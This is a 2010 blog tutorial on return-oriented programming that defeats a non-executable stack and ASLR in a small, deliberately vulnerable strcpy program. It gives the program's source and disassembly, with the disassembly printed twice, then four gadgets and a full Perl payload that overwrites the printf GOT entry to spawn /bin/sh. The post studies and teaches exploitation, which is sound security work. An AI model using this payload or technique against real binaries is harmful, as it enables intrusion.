Tuesday, May 4, 2010

Advanced Return-Oriented Exploit

This is a brief introduction to a cool little technique for buffer overflow exploits under the following conditions: the stack is not executable, the stack address is randomized, and the libc address is also randomized. In other words, we cannot simply use return-to-stack and return-to-libc.

A vulnerable program that I am going to use is a modified version of gera's in [1]. Here, we do not have stack canary protection, but I am going to make it much harder by modifying the code a little bit: by adding an exit system call and employing stack and libc address randomization (ASLR). The modified version is shown below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

int func(char *msg) {
    char buf[80];
    strcpy(buf,msg);
    buf[0] = toupper(buf[0]);
    strcpy(msg,buf);
    printf("Caps: %s\n",msg);
    exit(1);
}

int main(int argc, char** argv) {
    func(argv[1]);
}

1. Vulnerability

There is a classic strcpy vulnerability in the func function. The two consecutive strcpy calls enable us to write arbitrary values in an arbitrary address: first, modify the value of the msg from the first strcpy, and then write arbitrary values from the second strcpy. Note that overwriting the return address of func is not enough because it is protected with an exit system call. It is more clear if you look at the disassembled version of the program:

080484b4 <func>:
 80484b4:       55                      push   %ebp
 80484b5:       89 e5                   mov    %esp,%ebp
 80484b7:       83 ec 58                sub    $0×58,%esp
 80484ba:       8b 45 08                mov    0×8(%ebp),%eax
 80484bd:       89 44 24 04             mov    %eax,0×4(%esp)
 80484c1:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484c4:       89 04 24                mov    %eax,(%esp)
 80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
 80484cc:       0f b6 45 b0             movzbl -0×50(%ebp),%eax
 80484d0:       0f be c0                movsbl %al,%eax
 80484d3:       89 04 24                mov    %eax,(%esp)
 80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
 80484db:       88 45 b0                mov    %al,-0×50(%ebp)
 80484de:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484e1:       89 44 24 04             mov    %eax,0×4(%esp)
 80484e5:       8b 45 08                mov    0×8(%ebp),%eax
 80484e8:       89 04 24                mov    %eax,(%esp)
 80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
 80484f0:       8b 45 08                mov    0×8(%ebp),%eax
 80484f3:       89 44 24 04             mov    %eax,0×4(%esp)
 80484f7:       c7 04 24 00 86 04 08    movl   $0×8048600,(%esp)
 80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
 8048503:       c7 04 24 01 00 00 00    movl   $0×1,(%esp)
 804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
0804850f <main>:
 804850f:       8d 4c 24 04             lea    0×4(%esp),%ecx
 8048513:       83 e4 f0                and    $0xfffffff0,%esp
 8048516:       ff 71 fc                pushl  -0×4(%ecx)
 8048519:       55                      push   %ebp
 804851a:       89 e5                   mov    %esp,%ebp
 804851c:       51                      push   %ecx
 804851d:       83 ec 14                sub    $0×14,%esp
 8048520:       8b 41 04                mov    0×4(%ecx),%eax
 8048523:       83 c0 04                add    $0×4,%eax
 8048526:       8b 00                   mov    (%eax),%eax
 8048528:       89 04 24                mov    %eax,(%esp)
 804852b:       e8 84 ff ff ff          call   80484b4 <func>
 8048530:       83 c4 14                add    $0×14,%esp
 8048533:       59                      pop    %ecx
 8048534:       5d                      pop    %ebp
 8048535:       8d 61 fc                lea    -0×4(%ecx),%esp
 8048538:       c3                      ret
080484b4 <func>:
 80484b4:       55                      push   %ebp
 80484b5:       89 e5                   mov    %esp,%ebp
 80484b7:       83 ec 58                sub    $0×58,%esp
 80484ba:       8b 45 08                mov    0×8(%ebp),%eax
 80484bd:       89 44 24 04             mov    %eax,0×4(%esp)
 80484c1:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484c4:       89 04 24                mov    %eax,(%esp)
 80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
 80484cc:       0f b6 45 b0             movzbl -0×50(%ebp),%eax
 80484d0:       0f be c0                movsbl %al,%eax
 80484d3:       89 04 24                mov    %eax,(%esp)
 80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
 80484db:       88 45 b0                mov    %al,-0×50(%ebp)
 80484de:       8d 45 b0                lea    -0×50(%ebp),%eax
 80484e1:       89 44 24 04             mov    %eax,0×4(%esp)
 80484e5:       8b 45 08                mov    0×8(%ebp),%eax
 80484e8:       89 04 24                mov    %eax,(%esp)
 80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
 80484f0:       8b 45 08                mov    0×8(%ebp),%eax
 80484f3:       89 44 24 04             mov    %eax,0×4(%esp)
 80484f7:       c7 04 24 00 86 04 08    movl   $0×8048600,(%esp)
 80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
 8048503:       c7 04 24 01 00 00 00    movl   $0×1,(%esp)
 804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
0804850f <main>:
 804850f:       8d 4c 24 04             lea    0×4(%esp),%ecx
 8048513:       83 e4 f0                and    $0xfffffff0,%esp
 8048516:       ff 71 fc                pushl  -0×4(%ecx)
 8048519:       55                      push   %ebp
 804851a:       89 e5                   mov    %esp,%ebp
 804851c:       51                      push   %ecx
 804851d:       83 ec 14                sub    $0×14,%esp
 8048520:       8b 41 04                mov    0×4(%ecx),%eax
 8048523:       83 c0 04                add    $0×4,%eax
 8048526:       8b 00                   mov    (%eax),%eax
 8048528:       89 04 24                mov    %eax,(%esp)
 804852b:       e8 84 ff ff ff          call   80484b4 <func>
 8048530:       83 c4 14                add    $0×14,%esp
 8048533:       59                      pop    %ecx
 8048534:       5d                      pop    %ebp
 8048535:       8d 61 fc                lea    -0×4(%ecx),%esp
 8048538:       c3                      ret


2. Observation and Strategy


We can only modify an arbitrary memory region from the second strcpy, but it should not be the return address of func, because we need to bypass the exit system call. There are indeed several possible spots to jump to including dtors and GOT. In this example, I am going to overwrite GOT entry of the printf function. A GOT is typically in the code section of a program and its address is not randomized.

Now we can hijack the control flow when the printf is called, so the next step is to decide where to jump. We cannot simply return to libc because its address is randomized (we are not going to use brute forcing here). However, we know that the code section's addresses are fixed, and we are going to use a return-oriented programming technique introduced by Hovav [2]. In this problem, we can only use the code section of this small program. Therefore, there are only a few number of gadgets available.

The return-oriented programming that we are going to design works as follows: (1) retrieve an address to libc's strcpy function from the GOT, (2) compute a relative offset from strcpy function to system function, (3) obtain the address of the system function from the step 1 and 2, (4) set up the stack to have a pointer to "/bin/sh" string, 5) jump to the system function using indirect call (call *%eax).

(Note) Since we are using the "system" function, we cannot actually do "setuid" for this exploit. Calling an "exec" function in libc is trickier, and I will not cover it in this article.

3. Gadgets


We are going to use the following 4 gadgets that we can find from the code section to perform the exploitation.

(1)
0x80485a2 <__libc_csu_init+82>: add    $0xc,%esp
0x80485a5 <__libc_csu_init+85>: pop    %ebx
0x80485a6 <__libc_csu_init+86>: pop    %esi
0x80485a7 <__libc_csu_init+87>: pop    %edi
0x80485a8 <__libc_csu_init+88>: pop    %ebp
0x80485a9 <__libc_csu_init+89>: ret

(2)
0x804838c <_init+44>:   pop    %eax
0x804838d <_init+45>:   pop    %ebx
0x804838e <_init+46>:   leave
0x804838f <_init+47>:   ret

(3)
0x80485ce <__do_global_ctors_aux+30>:   add    0xf475fff8(%ebx),%eax
0x80485d4 <__do_global_ctors_aux+36>:   add    $0×4,%esp
0x80485d7 <__do_global_ctors_aux+39>:   pop    %ebx
0x80485d8 <__do_global_ctors_aux+40>:   pop    %ebp
0x80485d9 <__do_global_ctors_aux+41>:   ret

(4)
0x80484af <frame_dummy+31>:     call   *%eax

4. Final Exploit


Using the above four gadgets, I introduce the following exploit. Notice that this exploit is not just a simple return-oriented programming exploit, there are many techniques involved:
(1) Dynamically retrieving the system function's address from the GOT
(2) Changing the ebp register to point to the bss section so that we can control the esp and ebp continuously.
(3) Setting up the stack address to have enough space for the system call.

First, the second gadget sets up the eax and ebx values that are going to be used in the third gadget when computing the system function's address. The result of the "add 0xf475fff8(%ebx), %eax" instruction must produce the address of system function in libc. Specifically, 0xf475fff8(%ebx) must point to the strcpy's GOT entry, so the strcpy's address in libc is added with the value in eax register.

Changing the ebp register in the first gadget is the most tricky part. In the first gadget, we set up the ebp to point to a writable bss section (More precisely, beyond the bss section). Since the address of 0x804a2e8 is a writable region, we can set the address for ebp and esp. In the second gadget, we can set up the esp value by using the leave instruction. Thus, after the second gadget, both the ebp and the esp will point to the addresses in the bss section.

The final exploit in perl is shown below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
print "\xa2\x85\x04\x08" . # first gadget
      "AAAAAAAA" . # dummy
      "\xe8\xa2\x04\x08" . # set ebp
      "\x8c\x83\x04\x08" . # second gadget
      "\xc0\x52\xfc\xff" .
      "\x14\xa0\x8e\x13AAAA" .
      "/bin/sh;"  .
      "A"x48 .
      "\x10\xa0\x04\x08" . # GOT entry address of printf
      "\x30\xa0\x04\x08"x0xa0 . # dummy
      "\xce\x85\x04\x08" .
      "\x30\xa0\x04\x08"x0x2 . # dummy
      "\x30\xa0\x04\x08" . # dummy ebp
      "\xaf\x84\x04\x08" . # call *%eax
      "\x30\xa0\x04\x08";

5. Conclusion


There can be many possible ways of bypassing ASLR protections. Here, I present a way to exploit the return-oriented programming technique in a very limited environment: small code space, randomized stack and randomized libc.

About

My photo
Hi, I am a PhD candidate at CMU. I was one of the founding members of PPP (Plaid Parliament of Pwning). I like programming in OCaml, F#, Haskell, and C++.